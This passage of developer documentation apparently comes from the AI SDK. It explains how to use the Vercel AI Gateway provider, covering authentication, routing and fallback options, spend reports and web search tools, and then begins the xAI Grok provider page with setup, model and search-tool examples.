You can check if an error is an instance of AI_UnsupportedFunctionalityError using:
import { UnsupportedFunctionalityError } from 'ai';
if (UnsupportedFunctionalityError.isInstance(error)) {
// Handle the error
}
title: AI Gateway description: Learn how to use the AI Gateway provider with the AI SDK.
AI Gateway Provider
The AI Gateway provider connects you to models from multiple AI providers through a single interface. Instead of integrating with each provider separately, you can access OpenAI, Anthropic, Google, Meta, xAI, and other providers and their models.
Features
- Access models from multiple providers without having to install additional provider modules/dependencies
- Use the same code structure across different AI providers
- Switch between models and providers easily
- Automatic authentication when deployed on Vercel
- View pricing information across providers
- Observability for AI model usage through the Vercel dashboard
Setup
The Vercel AI Gateway provider is part of the AI SDK.
Basic Usage
For most use cases, you can use the AI Gateway directly with a model string:
// use plain model string with global provider
import { generateText } from 'ai';
const { text } = await generateText({
model: 'openai/gpt-5.4',
prompt: 'Hello world',
});
// use provider instance (requires version 5.0.36 or later)
import { generateText, gateway } from 'ai';
const { text } = await generateText({
model: gateway('openai/gpt-5.4'),
prompt: 'Hello world',
});
The AI SDK automatically uses the AI Gateway when you pass a model string in the creator/model-name format.
Provider Instance
You can also import the default provider instance gateway from ai:
import { gateway } from 'ai';
You may want to create a custom provider instance when you need to:
- Set custom configuration options (API key, base URL, headers)
- Use the provider in a provider registry
- Wrap the provider with middleware
- Use different settings for different parts of your application
To create a custom provider instance, import createGateway from ai:
import { createGateway } from 'ai';
const gateway = createGateway({
apiKey: process.env.AI_GATEWAY_API_KEY ?? '',
});
You can use the following optional settings to customize the AI Gateway provider instance:
- baseURL string
  Use a different URL prefix for API calls. The default prefix is https://ai-gateway.vercel.sh/v4/ai.
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the AI_GATEWAY_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- metadataCacheRefreshMillis number
  How frequently to refresh the metadata cache in milliseconds. Defaults to 5 minutes (300,000 ms).
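For instance, a custom instance might combine several of these settings (the header value here is a placeholder, and the fetch wrapper simply logs before delegating to the global fetch):
import { createGateway } from 'ai';
const gateway = createGateway({
  baseURL: 'https://ai-gateway.vercel.sh/v4/ai', // the documented default, shown explicitly
  apiKey: process.env.AI_GATEWAY_API_KEY ?? '',
  headers: { 'x-app-version': '1.2.3' }, // placeholder custom header
  fetch: async (input, init) => {
    console.log('AI Gateway request:', input);
    return fetch(input, init);
  },
});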
Authentication
The Gateway provider supports two authentication methods:
API Key Authentication
Set your API key via environment variable:
AI_GATEWAY_API_KEY=your_api_key_here
Or pass it directly to the provider:
import { createGateway } from 'ai';
const gateway = createGateway({
apiKey: 'your_api_key_here',
});
OIDC Authentication (Vercel Deployments)
When deployed to Vercel, the AI Gateway provider supports authenticating with OIDC (OpenID Connect) tokens, without API keys.
How OIDC Authentication Works
- In Production/Preview Deployments:
  - OIDC authentication is automatically handled
  - No manual configuration needed
  - Tokens are automatically obtained and refreshed
- In Local Development:
  - First, install and authenticate with the Vercel CLI
  - Run vercel env pull to download your project's OIDC token locally
  - For automatic token management, use vercel dev to start your development server; it handles token refreshing automatically
  - For manual token management: if not using vercel dev, note that OIDC tokens expire after 12 hours, so you'll need to run vercel env pull again to refresh the token before it expires
Read more about using OIDC tokens in the Vercel AI Gateway docs.
Bring Your Own Key (BYOK)
You can connect your own provider credentials to use with Vercel AI Gateway. This lets you use your existing provider accounts and access private resources.
To set up BYOK, add your provider credentials in your Vercel team's AI Gateway settings. Once configured, AI Gateway automatically uses your credentials. No code changes are needed.
For providers like Azure where you can use custom deployment names, you can configure model mappings to map gateway model slugs to your deployment names. See model mappings for details.
Learn more in the BYOK documentation.
Language Models
You can create language models using a provider instance. The first argument is the model ID in the format creator/model-name:
import { generateText } from 'ai';
const { text } = await generateText({
model: 'openai/gpt-5.4',
prompt: 'Explain quantum computing in simple terms',
});
AI Gateway language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).
Reranking Models
You can create reranking models using the rerankingModel method on the provider instance:
import { rerank } from 'ai';
import { gateway } from '@ai-sdk/gateway';
const { ranking } = await rerank({
model: gateway.rerankingModel('cohere/rerank-v3.5'),
query: 'What is the capital of France?',
documents: [
'Paris is the capital of France.',
'Berlin is the capital of Germany.',
'Madrid is the capital of Spain.',
],
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 0, score: 0.89, document: 'Paris is the capital of France.' },
// { originalIndex: 2, score: 0.15, document: 'Madrid is the capital of Spain.' },
// ]
Reranking models are useful for improving search results in retrieval-augmented generation (RAG) pipelines by re-scoring candidate documents after an initial retrieval step.
Available Models
The AI Gateway supports models from OpenAI, Anthropic, Google, Meta, xAI, Mistral, DeepSeek, Amazon Bedrock, Cohere, Perplexity, Alibaba, and other providers.
For the complete list of available models, see the AI Gateway documentation.
Dynamic Model Discovery
You can discover available models programmatically:
import { gateway, generateText } from 'ai';
const availableModels = await gateway.getAvailableModels();
// List all available models
availableModels.models.forEach(model => {
console.log(`${model.id}: ${model.name}`);
if (model.description) {
console.log(` Description: ${model.description}`);
}
if (model.pricing) {
console.log(` Input: $${model.pricing.input}/token`);
console.log(` Output: $${model.pricing.output}/token`);
if (model.pricing.cachedInputTokens) {
console.log(
` Cached input (read): $${model.pricing.cachedInputTokens}/token`,
);
}
if (model.pricing.cacheCreationInputTokens) {
console.log(
` Cache creation (write): $${model.pricing.cacheCreationInputTokens}/token`,
);
}
}
});
// Use any discovered model with plain string
const { text } = await generateText({
model: availableModels.models[0].id, // e.g., 'openai/gpt-5.4'
prompt: 'Hello world',
});
Credit Usage
You can check your team's current credit balance and usage:
import { gateway } from 'ai';
const credits = await gateway.getCredits();
console.log(`Team balance: ${credits.balance} credits`);
console.log(`Team total used: ${credits.total_used} credits`);
The getCredits() method returns your team's credit information based on the authenticated API key or OIDC token:
- balance number - Your team's current available credit balance
- total_used number - Total credits consumed by your team
Generation Lookup
Look up detailed information about a specific generation by its ID, including cost, token usage, latency, and provider details. Generation IDs are available in providerMetadata.gateway.generationId on both generateText and streamText responses.
When streaming, the generation ID is injected on the first content chunk, so you can capture it early in the stream without waiting for completion. This is especially useful in cases where a network interruption or mid-stream error could prevent you from receiving the final response — since the gateway records the final status server-side, you can use the generation ID to look up the results (including cost, token usage, and finish reason) later via getGenerationInfo().
import { gateway, generateText } from 'ai';
// Make a request
const result = await generateText({
model: gateway('anthropic/claude-sonnet-4'),
prompt: 'Explain quantum entanglement briefly',
});
// Get the generation ID from provider metadata
const generationId = result.providerMetadata?.gateway?.generationId;
// Look up detailed generation info
const generation = await gateway.getGenerationInfo({ id: generationId });
console.log(`Model: ${generation.model}`);
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Latency: ${generation.latency}ms`);
console.log(`Prompt tokens: ${generation.promptTokens}`);
console.log(`Completion tokens: ${generation.completionTokens}`);
With streamText, you can capture the generation ID from the first chunk via fullStream:
import { gateway, streamText } from 'ai';
const result = streamText({
model: gateway('anthropic/claude-sonnet-4'),
prompt: 'Explain quantum entanglement briefly',
});
let generationId: string | undefined;
for await (const part of result.fullStream) {
if (!generationId && part.providerMetadata?.gateway?.generationId) {
generationId = part.providerMetadata.gateway.generationId as string;
console.log(`Generation ID (early): ${generationId}`);
}
}
// Look up cost and usage after the stream completes
if (generationId) {
const generation = await gateway.getGenerationInfo({ id: generationId });
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Finish reason: ${generation.finishReason}`);
}
The getGenerationInfo() method accepts:
- id string - The generation ID to look up (format: gen_<ulid>, required)
It returns a GatewayGenerationInfo object with the following fields:
- id string - The generation ID
- totalCost number - Total cost in USD
- upstreamInferenceCost number - Upstream inference cost in USD (relevant for BYOK)
- usage number - Usage cost in USD (same as totalCost)
- createdAt string - ISO 8601 timestamp when the generation was created
- model string - Model identifier used
- isByok boolean - Whether Bring Your Own Key credentials were used
- providerName string - The provider that served this generation
- streamed boolean - Whether streaming was used
- finishReason string - Finish reason (e.g. 'stop')
- latency number - Time to first token in milliseconds
- generationTime number - Total generation time in milliseconds
- promptTokens number - Number of prompt tokens
- completionTokens number - Number of completion tokens
- reasoningTokens number - Reasoning tokens used (if applicable)
- cachedTokens number - Cached tokens used (if applicable)
- cacheCreationTokens number - Cache creation input tokens
- billableWebSearchCalls number - Number of billable web search calls
Examples
Basic Text Generation
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Write a haiku about programming',
});
console.log(text);
Streaming
import { streamText } from 'ai';
const { textStream } = await streamText({
model: 'openai/gpt-5.4',
prompt: 'Explain the benefits of serverless architecture',
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
Tool Usage
import { generateText, tool } from 'ai';
import { z } from 'zod';
const { text } = await generateText({
model: 'xai/grok-4',
prompt: 'What is the weather like in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the current weather for a location',
inputSchema: z.object({
location: z.string().describe('The location to get weather for'),
}),
execute: async ({ location }) => {
// Your weather API call here
return `It's sunny in ${location}`;
},
}),
},
});
Provider-Executed Tools
Some providers offer tools that are executed by the provider itself, such as OpenAI's web search tool. To use these tools through AI Gateway, import the provider to access the tool definitions:
import { generateText, stepCountIs } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: 'openai/gpt-5.4-mini',
prompt: 'What is the Vercel AI Gateway?',
stopWhen: stepCountIs(10),
tools: {
web_search: openai.tools.webSearch({}),
},
});
console.dir(result.text);
Gateway Tools
The AI Gateway provider includes built-in tools that are executed by the gateway itself. These tools can be used with any model through the gateway.
Perplexity Search
The Perplexity Search tool enables models to search the web using Perplexity's search API. This tool is executed by the AI Gateway and returns web search results that the model can use to provide up-to-date information.
import { gateway, generateText } from 'ai';
const result = await generateText({
model: 'openai/gpt-5.4-nano',
prompt: 'Search for news about AI regulations in January 2025.',
tools: {
perplexity_search: gateway.tools.perplexitySearch(),
},
});
console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));
You can also configure the search with optional parameters:
import { gateway, generateText } from 'ai';
const result = await generateText({
model: 'openai/gpt-5.4-nano',
prompt:
'Search for news about AI regulations from the first week of January 2025.',
tools: {
perplexity_search: gateway.tools.perplexitySearch({
maxResults: 5,
searchLanguageFilter: ['en'],
country: 'US',
searchDomainFilter: ['reuters.com', 'bbc.com', 'nytimes.com'],
}),
},
});
console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));
The Perplexity Search tool supports the following optional configuration options:
- maxResults number
  The maximum number of search results to return (1-20, default: 10).
- maxTokensPerPage number
  The maximum number of tokens to extract per search result page (256-2048, default: 2048).
- maxTokens number
  The maximum total tokens across all search results (default: 25000, max: 1000000).
- searchLanguageFilter string[]
  Filter search results by language using ISO 639-1 language codes (e.g., ['en'] for English, ['en', 'es'] for English and Spanish).
- country string
  Filter search results by country using ISO 3166-1 alpha-2 country codes (e.g., 'US' for United States, 'GB' for United Kingdom).
- searchDomainFilter string[]
  Limit search results to specific domains (e.g., ['reuters.com', 'bbc.com']). This is useful for restricting results to trusted sources.
- searchRecencyFilter 'day' | 'week' | 'month' | 'year'
  Filter search results by relative time period. Useful for always getting recent results (e.g., 'week' for results from the last week).
The tool works with both generateText and streamText:
import { gateway, streamText } from 'ai';
const result = streamText({
model: 'openai/gpt-5.4-nano',
prompt: 'Search for the latest news about AI regulations.',
tools: {
perplexity_search: gateway.tools.perplexitySearch(),
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'text-delta':
process.stdout.write(part.text);
break;
case 'tool-call':
console.log('\nTool call:', JSON.stringify(part, null, 2));
break;
case 'tool-result':
console.log('\nTool result:', JSON.stringify(part, null, 2));
break;
}
}
Parallel Search
The Parallel Search tool enables models to search the web using Parallel AI's Search API. This tool is optimized for LLM consumption, returning relevant excerpts from web pages that can replace multiple keyword searches with a single call.
import { gateway, generateText } from 'ai';
const result = await generateText({
model: 'openai/gpt-5.4-nano',
prompt: 'Research the latest developments in quantum computing.',
tools: {
parallel_search: gateway.tools.parallelSearch(),
},
});
console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));
You can also configure the search with optional parameters:
import { gateway, generateText } from 'ai';
const result = await generateText({
model: 'openai/gpt-5.4-nano',
prompt: 'Find detailed information about TypeScript 5.0 features.',
tools: {
parallel_search: gateway.tools.parallelSearch({
mode: 'agentic',
maxResults: 5,
sourcePolicy: {
includeDomains: ['typescriptlang.org', 'github.com'],
},
excerpts: {
maxCharsPerResult: 8000,
},
}),
},
});
console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));
The Parallel Search tool supports the following optional configuration options:
- mode 'one-shot' | 'agentic'
  Mode preset for different use cases:
  - 'one-shot' - Comprehensive results with longer excerpts for single-response answers (default)
  - 'agentic' - Concise, token-efficient results optimized for multi-step agentic workflows
- maxResults number
  Maximum number of results to return (1-20). Defaults to 10 if not specified.
- sourcePolicy object
  Source policy for controlling which domains to include/exclude:
  - includeDomains - List of domains to include in search results
  - excludeDomains - List of domains to exclude from search results
  - afterDate - Only include results published after this date (ISO 8601 format)
- excerpts object
  Excerpt configuration for controlling result length:
  - maxCharsPerResult - Maximum characters per result
  - maxCharsTotal - Maximum total characters across all results
- fetchPolicy object
  Fetch policy for controlling content freshness:
  - maxAgeSeconds - Maximum age in seconds for cached content (set to 0 for always fresh)
The tool works with both generateText and streamText:
import { gateway, streamText } from 'ai';
const result = streamText({
model: 'openai/gpt-5.4-nano',
prompt: 'Research the latest AI safety guidelines.',
tools: {
parallel_search: gateway.tools.parallelSearch(),
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'text-delta':
process.stdout.write(part.text);
break;
case 'tool-call':
console.log('\nTool call:', JSON.stringify(part, null, 2));
break;
case 'tool-result':
console.log('\nTool result:', JSON.stringify(part, null, 2));
break;
}
}
Custom Reporting
Track usage per end-user and categorize requests with tags, then query the data through the reporting API.
Usage Tracking with User and Tags
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'openai/gpt-5.4',
prompt: 'Summarize this document...',
providerOptions: {
gateway: {
user: 'user-abc-123', // Track usage for this specific end-user
tags: ['document-summary', 'premium-feature'], // Categorize for reporting
} satisfies GatewayProviderOptions,
},
});
This allows you to:
- View usage and costs broken down by end-user in your analytics
- Filter and analyze spending by feature or use case using tags
- Track which users or features are driving the most AI usage
Querying Spend Reports
Use the getSpendReport() method to query usage data programmatically. The reporting API is only available for Vercel Pro and Enterprise plans. For pricing, see the Custom Reporting docs.
import { gateway } from 'ai';
const report = await gateway.getSpendReport({
startDate: '2026-03-01',
endDate: '2026-03-25',
groupBy: 'model',
});
for (const row of report.results) {
console.log(`${row.model}: $${row.totalCost.toFixed(4)}`);
}
The getSpendReport() method accepts the following parameters:
- startDate string - Start date in YYYY-MM-DD format (inclusive, required)
- endDate string - End date in YYYY-MM-DD format (inclusive, required)
- groupBy string - Aggregation dimension: 'day' (default), 'user', 'model', 'tag', 'provider', or 'credential_type'
- datePart string - Time granularity when groupBy is 'day': 'day' or 'hour'
- userId string - Filter to a specific user
- model string - Filter to a specific model (e.g. 'anthropic/claude-sonnet-4.5')
- provider string - Filter to a specific provider (e.g. 'anthropic')
- credentialType string - Filter by 'byok' or 'system' credentials
- tags string[] - Filter to requests matching these tags
Each row in results contains a grouping field (matching your groupBy choice) and metrics:
- totalCost number - Total cost in USD
- marketCost number - Market cost in USD
- inputTokens number - Number of input tokens
- outputTokens number - Number of output tokens
- cachedInputTokens number - Number of cached input tokens
- cacheCreationInputTokens number - Number of cache creation input tokens
- reasoningTokens number - Number of reasoning tokens
- requestCount number - Number of requests
You can combine tracking and querying to analyze spend by tags you defined:
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { gateway, streamText } from 'ai';
// 1. Make requests with tags
const result = streamText({
model: gateway('anthropic/claude-haiku-4.5'),
prompt: "Summarize this quarter's results",
providerOptions: {
gateway: {
tags: ['team:finance', 'feature:summaries'],
} satisfies GatewayProviderOptions,
},
});
// 2. Later, query spend filtered by those tags
const report = await gateway.getSpendReport({
startDate: '2026-03-01',
endDate: '2026-03-31',
groupBy: 'tag',
tags: ['team:finance'],
});
for (const row of report.results) {
console.log(`${row.tag}: $${row.totalCost.toFixed(4)} (${row.requestCount} requests)`);
}
Provider Options
The AI Gateway provider accepts provider options that control routing behavior and provider-specific configurations.
Gateway Provider Options
You can use the gateway key in providerOptions to control how AI Gateway routes requests:
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Explain quantum computing',
providerOptions: {
gateway: {
order: ['vertex', 'anthropic'], // Try Vertex AI first, then Anthropic
only: ['vertex', 'anthropic'], // Only use these providers
} satisfies GatewayProviderOptions,
},
});
The following gateway provider options are available:
- order string[]
  Specifies the sequence of providers to attempt when routing requests. The gateway will try providers in the order specified. If a provider fails or is unavailable, it will move to the next provider in the list.
  Example: order: ['bedrock', 'anthropic'] will attempt Amazon Bedrock first, then fall back to Anthropic.
- only string[]
  Restricts routing to only the specified providers. When set, the gateway will never route to providers not in this list, even if they would otherwise be available.
  Example: only: ['anthropic', 'vertex'] will only allow routing to Anthropic or Vertex AI.
- sort 'cost' | 'ttft' | 'tps'
  Sorts available providers by a performance or cost metric before routing. The gateway will try the best-scoring provider first and fall back through the rest in sorted order. If unspecified, providers are ordered using the gateway's default system ranking.
  - 'cost' - lowest cost first
  - 'ttft' - lowest time-to-first-token first
  - 'tps' - highest tokens-per-second first
  When combined with order, the user-specified providers are promoted to the front while remaining providers follow the sorted order.
  Example: sort: 'ttft' will route to the provider with the fastest time-to-first-token.
  When sort is active, the response's providerMetadata.gateway.routing.sort object contains the sort option used, the resulting execution order, per-provider metric values, and any providers that were deprioritized.
- models string[]
  Specifies fallback models to use when the primary model fails or is unavailable. The gateway will try the primary model first (specified in the model parameter), then try each model in this array in order until one succeeds.
  Example: models: ['openai/gpt-5.4-nano', 'gemini-3-flash-preview'] will try the fallback models in order if the primary model fails.
- user string
  Optional identifier for the end user on whose behalf the request is being made. This is used for spend tracking and attribution purposes, allowing you to track usage per end-user in your application.
  Example: user: 'user-123' will associate this request with end-user ID "user-123" in usage reports.
- tags string[]
  Optional array of tags for categorizing and filtering usage in reports. Useful for tracking spend by feature, prompt version, or any other dimension relevant to your application.
  Example: tags: ['chat', 'v2'] will tag this request with "chat" and "v2" for filtering in usage analytics.
- byok Record<string, Array<Record<string, unknown>>>
  Request-scoped BYOK (Bring Your Own Key) credentials to use for this request. When provided, any cached BYOK credentials configured in the gateway system are not considered. Requests may still fall back to system credentials if the provided credentials fail.
  Each provider can have multiple credentials (tried in order). The structure is a record where keys are provider slugs and values are arrays of credential objects.
  Each credential can optionally include a modelMappings array to map AI Gateway model slugs to your deployment names (for example, custom Azure deployment names). If a BYOK request fails, the gateway falls back to system credentials using the default model name.
  Examples:
  - Single provider: byok: { 'anthropic': [{ apiKey: 'sk-ant-...' }] }
  - Multiple credentials: byok: { 'vertex': [{ project: 'proj-1', googleCredentials: { privateKey: '...', clientEmail: '...' } }, { project: 'proj-2', googleCredentials: { privateKey: '...', clientEmail: '...' } }] }
  - Multiple providers: byok: { 'anthropic': [{ apiKey: '...' }], 'bedrock': [{ accessKeyId: '...', secretAccessKey: '...' }] }
  - With model mappings: byok: { 'azure': [{ apiKey: '...', resourceName: '...', modelMappings: [{ gatewayModelSlug: 'openai/gpt-5.4-nano', customModelId: 'my-deployment' }] }] }
- zeroDataRetention boolean
  Restricts routing to providers that have zero data retention agreements with Vercel for AI Gateway. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers with zero data retention agreements will be used. If there are no providers available for the model with zero data retention, the request will fail. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
- disallowPromptTraining boolean
  Restricts routing to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers that do not train on prompt data will be used. If there are no providers available for the model that disallow prompt training, the request will fail.
- hipaaCompliant boolean
  Restricts routing to models and tools from providers that have signed a BAA with Vercel for the use of AI Gateway (requires the Vercel HIPAA BAA add-on). BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
- quotaEntityId string
  The unique identifier for the entity against which quota is tracked. Used for quota management and enforcement purposes.
- providerTimeouts object
  Per-provider timeouts for BYOK credentials in milliseconds. Controls how long to wait for a provider to start responding before falling back to the next available provider.
  Example: providerTimeouts: { byok: { openai: 5000, anthropic: 2000 } }
  For full details, see Provider Timeouts.
You can combine these options to have fine-grained control over routing and tracking:
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Write a haiku about programming',
providerOptions: {
gateway: {
order: ['vertex'], // Prefer Vertex AI
only: ['anthropic', 'vertex'], // Only allow these providers
} satisfies GatewayProviderOptions,
},
});
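Provider Sorting Example
The sort option routes to the best-scoring provider first. A minimal sketch using the documented 'ttft' metric (the prompt text is illustrative):
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Write a haiku about latency',
  providerOptions: {
    gateway: {
      sort: 'ttft', // fastest time-to-first-token first
    } satisfies GatewayProviderOptions,
  },
});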
Model Fallbacks Example
The models option enables automatic fallback to alternative models when the primary model fails:
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'openai/gpt-5.4', // Primary model
prompt: 'Write a TypeScript haiku',
providerOptions: {
gateway: {
models: ['openai/gpt-5.4-nano', 'gemini-3-flash-preview'], // Fallback models
} satisfies GatewayProviderOptions,
},
});
// This will:
// 1. Try openai/gpt-5.4 first
// 2. If it fails, try openai/gpt-5.4-nano
// 3. If that fails, try gemini-3-flash-preview
// 4. Return the result from the first model that succeeds
Zero Data Retention Example
Set zeroDataRetention to true to route requests to providers that have zero data retention agreements with Vercel for AI Gateway. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers with zero data retention agreements will be used. If there are no providers available for the model with zero data retention, the request will fail. When zeroDataRetention is false or not specified, there is no enforcement of restricting routing. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Analyze this sensitive document...',
providerOptions: {
gateway: {
zeroDataRetention: true,
} satisfies GatewayProviderOptions,
},
});
Disallow Prompt Training Example
Set disallowPromptTraining to true to route requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers that do not train on prompt data will be used. If there are no providers available for the model that disallow prompt training, the request will fail. When disallowPromptTraining is false or not specified, there is no enforcement of restricting routing.
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Analyze this proprietary business data...',
providerOptions: {
gateway: {
disallowPromptTraining: true,
} satisfies GatewayProviderOptions,
},
});
HIPAA Compliance Example
Set hipaaCompliant to true to route requests only to models or tools by providers that have signed a BAA with Vercel for the use of AI Gateway. If the model or tool does not have a HIPAA-compliant provider, the request will fail. When hipaaCompliant is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Analyze this patient data...',
providerOptions: {
gateway: {
hipaaCompliant: true,
} satisfies GatewayProviderOptions,
},
});
Quota Entity ID Example
Set quotaEntityId to track and enforce quota against a specific entity. This is useful for multi-tenant applications where you need to manage quota at the entity level (e.g., per organization or team).
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Summarize this report...',
providerOptions: {
gateway: {
quotaEntityId: 'org-123',
} satisfies GatewayProviderOptions,
},
});
Provider-Specific Options
When using provider-specific options through AI Gateway, use the actual provider name (e.g. anthropic, openai, not gateway) as the key:
import type { AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
prompt: 'Explain quantum computing',
providerOptions: {
gateway: {
order: ['vertex', 'anthropic'],
} satisfies GatewayProviderOptions,
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
This works with any provider supported by AI Gateway. Each provider has its own set of options - see the individual provider documentation pages for details on provider-specific options.
Available Providers
AI Gateway supports routing to 20+ providers.
For a complete list of available providers and their slugs, see the AI Gateway documentation.
Model Capabilities
Model capabilities depend on the specific provider and model you're using. For detailed capability information, see:
- AI Gateway provider options for an overview of available providers
- Individual AI SDK provider pages for specific model capabilities and features
title: xAI Grok description: Learn how to use xAI Grok and Imagine.
xAI Grok Provider
The xAI Grok provider contains language model support for the xAI API.
Setup
The xAI Grok provider is available via the @ai-sdk/xai module. You can
install it with
pnpm add @ai-sdk/xai
Provider Instance
You can import the default provider instance xai from @ai-sdk/xai:
import { xai } from '@ai-sdk/xai';
If you need a customized setup, you can import createXai from @ai-sdk/xai
and create a provider instance with your settings:
import { createXai } from '@ai-sdk/xai';
const xai = createXai({
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the xAI provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.x.ai/v1. -
apiKey string
API key that is being sent using the
Authorization header. It defaults to the XAI_API_KEY environment variable. -
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global
fetch function. You can use it as middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Language Models
You can create xAI models using a provider instance. The
first argument is the model id, e.g. grok-4.20-non-reasoning.
const model = xai('grok-4.20-non-reasoning');
By default, xai(modelId) uses the Responses API. To use the Chat Completions API (legacy), use xai.chat(modelId).
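For example, to target the legacy Chat Completions API explicitly (model ID illustrative):
const legacyModel = xai.chat('grok-3');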
Example
You can use xAI language models to generate text with the generateText function:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text } = await generateText({
model: xai('grok-4.20-non-reasoning'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
xAI language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
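As a minimal streaming sketch:
import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';
const result = streamText({
  model: xai('grok-4.20-non-reasoning'),
  prompt: 'Write a short story about a robot learning to cook.',
});
// print the text as it streams in
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}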
Responses API (Agentic Tools)
The xAI Responses API is the default when using xai(modelId). You can also use xai.responses(modelId) explicitly. This enables the model to autonomously orchestrate tool calls and research on xAI's servers.
const model = xai.responses('grok-4.20-non-reasoning');
The Responses API provides server-side tools that the model can autonomously execute during its reasoning process:
- web_search: Real-time web search and page browsing
- x_search: Search X (Twitter) posts, users, and threads
- code_execution: Execute Python code for calculations and data analysis
- view_image: View and analyze images
- view_x_video: View and analyze videos from X posts
- mcp_server: Connect to remote MCP servers and use their tools
- file_search: Search through documents in vector stores (collections)
Vision
The Responses API supports image input with vision models:
import fs from 'node:fs';
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text } = await generateText({
model: xai.responses('grok-3'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What do you see in this image?' },
{ type: 'image', image: fs.readFileSync('./image.png') },
],
},
],
});
Web Search Tool
The web search tool enables autonomous web research with optional domain filtering and image understanding:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'What are the latest developments in AI?',
tools: {
web_search: xai.tools.webSearch({
allowedDomains: ['arxiv.org', 'openai.com'],
enableImageUnderstanding: true,
}),
},
});
console.log(text);
console.log('Citations:', sources);
Web Search Parameters
-
allowedDomains string[]
Only search within specified domains (max 5). Cannot be used with
excludedDomains. -
excludedDomains string[]
Exclude specified domains from search (max 5). Cannot be used with
allowedDomains. -
enableImageUnderstanding boolean
Enable the model to view and analyze images found during search. Increases token usage.
X Search Tool
The X search tool enables searching X (Twitter) for posts, with filtering by handles and date ranges:
const { text, sources } = await generateText({
model: xai.responses('grok-4.20-non-reasoning'),
prompt: 'What are people saying about AI on X this week?',
tools: {
x_search: xai.tools.xSearch({
allowedXHandles: ['elonmusk', 'xai'],
fromDate: '2025-10-23',
toDate: '2025-10-30',
enableImageUnderstanding: true,
enableVideoUnderstanding: true,
}),
},
});
X Search Parameters
-
allowedXHandles string[]
Only search posts from specified X handles (max 10). Cannot be used with
excludedXHandles. -
excludedXHandles string[]
Exclude posts from specified X handles (max 10). Cannot be used with
